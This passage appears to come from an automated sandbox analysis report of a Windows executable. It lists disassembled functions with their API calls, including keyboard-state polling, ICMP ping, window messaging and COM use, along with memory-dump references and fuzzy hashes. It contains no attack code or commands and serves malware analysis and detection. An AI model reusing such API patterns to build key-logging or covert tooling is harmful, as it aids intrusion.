                                                                                                                                                                                      • Instruction ID: 51bad74698abab7108e3872eef0ca80e8338f406a7a5e60d0885f6c4a4d12a8e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f97e6d6856a652ec04853cf5f7e4c2cb07b2d961c4d56a5c386a158de24bb776
                                                                                                                                                                                      • Instruction Fuzzy Hash: 404121B680412C6ADF25EB90EC41FEEB3BDAB58310F0041E6B509A2055EB349FD8CF64
                                                                                                                                                                                      Function 009084A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                      • __itow.LIBCMT ref: 00908519
                                                                                                                                                                                        • Part of subcall function 00922177: _xtow@16.LIBCMT ref: 00922198
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                                                                                      • Opcode ID: 804a2d3fb9ccf3b6f3a091a475a335ca0ca45ea5a51fbd18e42f72b922262a6c
                                                                                                                                                                                      • Instruction ID: feef5d12de0b1c5b90950cbe32b8e97ce8e7970a8ffa587701833c3566e3d585
                                                                                                                                                                                      • Opcode Fuzzy Hash: 804a2d3fb9ccf3b6f3a091a475a335ca0ca45ea5a51fbd18e42f72b922262a6c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C410672A04615EFDB24DF38E841F6A77E9BF84310F20885EF489D61D2EA719A41CB10
                                                                                                                                                                                      Function 00925C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00925CCA
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00925D63
                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00925D99
                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00925DB6
                                                                                                                                                                                      • __allrem.LIBCMT ref: 00925E0C
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00925E28
                                                                                                                                                                                      • __allrem.LIBCMT ref: 00925E3F
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00925E5D
                                                                                                                                                                                      • __allrem.LIBCMT ref: 00925E74
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00925E92
                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00925F03
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                      • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                                      • Instruction ID: da21b5d7466b5d0f9b9ec816f86de1dd2ac943d40bb1ae6549af8dc3b6015fdc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                                      • Instruction Fuzzy Hash: D7712C71A01B26ABD714DF78EC41B6A73B8BF50324F168139F414D7685F770EA408B90
                                                                                                                                                                                      Function 009457FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00945816
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(009C18F0,000000FF,00000000,00000030), ref: 00945877
                                                                                                                                                                                      • SetMenuItemInfoW.USER32(009C18F0,00000004,00000000,00000030), ref: 009458AD
                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 009458BF
                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00945903
                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0094591F
                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00945949
                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0094598E
                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009459D4
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009459E8
                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00945A09
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4176008265-0
                                                                                                                                                                                      • Opcode ID: 167cf6cbf5e70848d8048cef10635a21e35f5acba0a6e029fb52d08071b3a1bd
                                                                                                                                                                                      • Instruction ID: a684bedbbd9abcf50a5e3bde5823371bac758c2030de7458cf09b1a27cd5b9f6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 167cf6cbf5e70848d8048cef10635a21e35f5acba0a6e029fb52d08071b3a1bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC61BC70914649EFDB11DFE4C888EAE7BBCEB45318F19055AF842E7292D730AD05DB21
                                                                                                                                                                                      Function 00969A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00969AA5
                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00969AA8
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00969ACC
                                                                                                                                                                                      • _memset.LIBCMT ref: 00969ADD
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00969AEF
                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00969B67
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 830647256-0
                                                                                                                                                                                      • Opcode ID: 26fb349483190814d5d183982c325f1f7689a959a3cdfc864ecf3e9bf4b17105
                                                                                                                                                                                      • Instruction ID: f6fe27079bad720d269ef59c1b479cf1b837bce6edf7b2e368eedfcfcdc1033f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 26fb349483190814d5d183982c325f1f7689a959a3cdfc864ecf3e9bf4b17105
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45616975A00208AFDB10DFA8CC81FEE77F8AF49700F10015AFA19E7292D774A945DB54
                                                                                                                                                                                      Function 00943569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00943591
                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00943612
                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 0094362D
                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00943647
                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 0094365C
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00943674
                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00943686
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0094369E
                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 009436B0
                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 009436C8
                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 009436DA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                      • Opcode ID: 936b8742257c5d02d76fe209b4f8ff20f1fe9169d405f6edd0f23a39353d3d1c
                                                                                                                                                                                      • Instruction ID: 60174de7aa29e9af8992f0d8442c34c62edd964440eb628c91005da77a50a6cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 936b8742257c5d02d76fe209b4f8ff20f1fe9169d405f6edd0f23a39353d3d1c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1741B7705187CA7DFF719B748816BA5BEA86F11344F04C05AE5C6463C2EBA49BC8CB62
                                                                                                                                                                                      Function 0093A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0093A2AA
                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 0093A2F5
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0093A307
                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0093A327
                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0093A36A
                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 0093A37E
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0093A393
                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 0093A3A0
                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093A3A9
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0093A3BB
                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093A3C6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                      • Opcode ID: 967d7b0657875651fb05aa48e5df6a728c52b2b74f4e102254c62936d09d75cc
                                                                                                                                                                                      • Instruction ID: 6823e9a77d708e44aed18f8f3755cdb119aea5cfd78f39c427b347769a0b74d3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 967d7b0657875651fb05aa48e5df6a728c52b2b74f4e102254c62936d09d75cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 23414C35905219AFCB01EFA4DC889EEBBB9FF48314F008065F551A32A1DB34AA45DFA1
                                                                                                                                                                                      Function 0095B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • CoInitialize.OLE32 ref: 0095B298
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0095B2A3
                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0098D8FC,?), ref: 0095B303
                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 0095B376
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0095B410
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0095B471
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                                                                                      • Opcode ID: 46d8c1f4b7c44550aadee96d6f715d5dbb98ea1347a8a7f61d0bada376b9d2c7
                                                                                                                                                                                      • Instruction ID: 3f4d6ef64b1d3f050ed19d07aff51fceb8b5c9fa08dccf4070da2149529274c0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46d8c1f4b7c44550aadee96d6f715d5dbb98ea1347a8a7f61d0bada376b9d2c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4861BD31209311AFD710DF65C885F6EB7E8AF88715F04481DF985AB2A2D770ED49CB92
                                                                                                                                                                                      Function 00958694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 009586F5
                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 0095873A
                                                                                                                                                                                      • gethostbyname.WSOCK32(?), ref: 00958746
                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00958754
                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009587C4
                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009587DA
                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0095884F
                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 00958855
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                      • Opcode ID: 54ef11162b0d64cd518fd6add85b785e81e565926305d4cf96ae690628d05025
                                                                                                                                                                                      • Instruction ID: 48afb4da6191b01ad5444b9749e92830100ac6335a39180de535d7eb9b305516
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54ef11162b0d64cd518fd6add85b785e81e565926305d4cf96ae690628d05025
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D5193716042019FD710EF21CD85B6B7BE4EF48721F148929FA66EB2E1DB34E804DB41
                                                                                                                                                                                      Function 00969C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00969C68
                                                                                                                                                                                      • CreateMenu.USER32 ref: 00969C83
                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00969C92
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00969D1F
                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00969D35
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00969D3F
                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00969D70
                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00969D7E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 176399719-4108050209
                                                                                                                                                                                      • Opcode ID: 882b7e05cc9872ea8a81f8638321607c07f7d2df2ba90d0c123ae0cb4f519bc3
                                                                                                                                                                                      • Instruction ID: 0ee18b42f7a4ad826e21c5d16b74f2cdf930a3a05356368b1f85b9d547a747df
                                                                                                                                                                                      • Opcode Fuzzy Hash: 882b7e05cc9872ea8a81f8638321607c07f7d2df2ba90d0c123ae0cb4f519bc3
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9415675A05209EFDB20EF68D994FAA7BB9FF49314F140029F945A7391D730A910DF60
                                                                                                                                                                                      Function 0094EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0094EC1E
                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0094EC94
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0094EC9E
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0094ED0B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                      • Opcode ID: d2e335e8ae6d38d356b116e3b54a91ab31bee0ae6bd02c00b3c499b0e6a4faab
                                                                                                                                                                                      • Instruction ID: 245cfc708d2fb0a8c8f03d8c13ada0396988b9077441790b27a16527a4c804d3
                                                                                                                                                                                      • Opcode Fuzzy Hash: d2e335e8ae6d38d356b116e3b54a91ab31bee0ae6bd02c00b3c499b0e6a4faab
                                                                                                                                                                                      • Instruction Fuzzy Hash: B431B035A00209AFC700EBA4C989FAEBBB8FF84715F108516F542E72D1DB719E41CB91
                                                                                                                                                                                      Function 0093C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0093C782
                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 0093C78D
                                                                                                                                                                                      • GetParent.USER32 ref: 0093C7A9
                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0093C7AC
                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0093C7B5
                                                                                                                                                                                      • GetParent.USER32(?), ref: 0093C7D1
                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0093C7D4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 313823418-1403004172
                                                                                                                                                                                      • Opcode ID: e31e39a3a61d7aed8b0d513b07c65336615fb3efc34e4cea2e9dddf48a346e40
                                                                                                                                                                                      • Instruction ID: db5fdfc3b8d25d1a804f3241dd6af8683777b1eb53fc10a2a9482afa60be549d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e31e39a3a61d7aed8b0d513b07c65336615fb3efc34e4cea2e9dddf48a346e40
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8421A1B4A00208AFDB05EBA4CC85EFEB7A9EF85310F104115F962E72D1EB785815AF20
                                                                                                                                                                                      Function 0093C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
